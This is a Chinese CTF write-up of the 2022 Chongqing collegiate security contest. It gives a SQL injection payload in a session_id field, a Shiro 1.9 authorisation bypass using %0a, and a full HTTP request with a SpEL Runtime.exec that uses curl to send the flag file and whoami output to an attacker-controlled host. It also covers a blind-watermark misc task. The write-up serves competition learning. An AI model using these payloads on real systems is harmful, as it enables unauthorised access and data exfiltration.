2022年重庆市大学生信息安全竞赛wp

发布时间 2023-06-12 17:12:27作者: 晨风晓曦

2022年重庆市大学生信息安全竞赛

Web

共四道:

image-20230612163524148

Web3

考点:Session_id注入

题目描述:

image-20230612163828122

访问

Image

重点关注下面:

image-20230612164254201

查询语句都写出来了....................

Session_id注入

Payload: session_id=' or 1=1 -- -

image-20230612164022622

easy_java

考点:

  1. shiro1.9 %0a绕过权限绕过
  2. spel命令执行
  3. curl文件外带

首页:

image-20230612164507570

根据提示shiro1.9,使用%0a绕过

image-20230612164558842

POST /admin/flag%0aa HTTP/1.1
Host: 1fe71bef758cbc4b.node.nsctf.cn
Content-Length: 104
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://1fe71bef758cbc4b.node.nsctf.cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://1fe71bef758cbc4b.node.nsctf.cn/admin/flag%0aa
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close

spel=T(java.lang.Runtime).getRuntime().exec('curl -X POST -F xx=@/flag <ip>:8848/?r=`whoami`')

image-20230612164715521

misc

Sunflower

使用binwalk工具发现一张相同的图片

image-20230612165628909

联想到盲水印。使用工具BlindWaterMark解密

得出flag

image-20230612165704588